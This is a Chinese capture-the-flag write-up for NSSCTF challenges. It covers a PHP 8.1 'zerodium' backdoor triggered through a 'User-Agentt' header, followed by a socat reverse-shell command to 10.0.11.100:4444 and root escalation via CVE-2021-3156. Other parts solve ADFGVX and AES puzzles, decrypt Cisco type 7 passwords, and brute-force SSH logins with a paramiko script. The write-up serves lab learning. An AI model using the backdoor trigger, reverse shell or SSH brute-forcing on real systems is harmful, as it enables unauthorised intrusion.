Web

Becomeroot

首先是个php8.1的后门zerodium

在请求头里加上User-Agentt: zerodium{cmd}可以实现RCE。

直接弹shell。弹shell之后使用socat增加tty。

Shell
#反弹机:socat file:`tty`,raw,echo=0 tcp-listen:4444#靶机socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.11.100:4444

然后用CVE-2021-3156拿root权限即可。

Crypto

过年来下棋

棋盘密码

类型:ADFGVX,密码lucky。

年画

首先可以发现enc_c是用NSSCTF{^key得到的。所以key可以直接拿到。然后就反过来写一个解密就行了。

Python
from PIL import Imagefrom Crypto.Cipher import AESfrom Crypto.Util.Padding import *enc_c=b'&2#3-(\\x1e9*6"&$\\x02=&'flag=b"NSSCTF{"key=b""for i in range(len(enc_c)):    key += bytes([enc_c[i] ^ flag[i % 7]])print("[+] Got key: ", key)w,h = Image.open("random_image.png").sizeprint(f"[+] Image size: {w}x{h}")bin_data = "".join(open("cipher.txt").readlines()).replace("\\n", "")bin_data = [int(bin_data[i:i+8],2) for i in range(0, len(bin_data), 8)]pixel_data = [bin_data[i:i+3] for i in range(0, len(bin_data), 3)]print(f"[+] Binary data pixels: {len(pixel_data)}")print("[+] Recover Pixels with RGB to cipher.png")img = Image.new("RGB", (w,h))pixels = img.load()for x in range(w):    for y in range(h):        pixels[x,y] = tuple(pixel_data[x*h+y])print("[+] Recover cipher.png with key and save to flag.png")pixels = img.tobytes()cipher = AES.new(key, AES.MODE_ECB)dec_pixels = cipher.decrypt(pixels)# dec_unpad = unpad(dec_pixels, AES.block_size)dec_img = Image.frombytes(img.mode, img.size, dec_pixels)dec_img.save("flag.png")print("[+] Done! Check flag.png for the flag!")

Misc

温馨的酒吧

成分复杂的一道题()

反正整个交互树都看一遍就有了。

Number 7

cisco设备上的type7加密。

奇奇怪怪的原因最后两位解密不了。后来看了下发现最后两位直接是明文。

Python
from binascii import unhexlifyr = "182A1918071C152E0A4737263A3E780A6F6A075A112742777C687D0700773F7D39560063487D"r = unhexlify(r[2:])key = b"dsfd;kfoA,.iyewrkldJKDHSUBsgvca69834ncxv9873254k;fg87"print("[+] Cipher: ",r)for salt in range(52):    f = b""    for i in range(len(r[:-2])):        f += bytes([r[i] ^ key[(i+salt)% len(key)]])    f += r[-2:]    if b"NSSCTF" in f:        print("[+] Found salt: ", salt)        print("[+] Decrypted: ", f)        break

usersssssssss和revenge

其实是同一个题,后面一个把wordlist加长了,flag放在.flag.txt下。(直接ls是看不到的)

直接用paramiko库写了脚本。

Python
import paramikoimport hashlibimport logginglogging.getLogger("paramiko").setLevel(logging.DEBUG)client = paramiko.SSHClient()client.set_missing_host_key_policy(paramiko.AutoAddPolicy())users = open("wl.txt").read().split("\\n")passs = [hashlib.md5(user.encode()).hexdigest() for user in users]for user, passw in zip(users, passs):    try:        client.connect("node2.anna.nssctf.cn",28808,username=user,password=passw)        stdin, stdout, stderr = client.exec_command("ls -a")        r = stdout.read().decode().split("\\n")        flag = [i for i in r if "flag" in i]        print(f"[*] {user} {passw} run ls with output {r}")        if flag != []:            print(f"[+] Found flag in user {user} with password {passw}!")            stdin, stdout, stderr = client.exec_command(f"cat {flag[0]}")            print(f"[+] Flag: {stdout.read().decode()}")            break    except Exception as e:        print(f"[-] Failed with user {user} and password {passw}: {e}")        pass    finally:        client.close()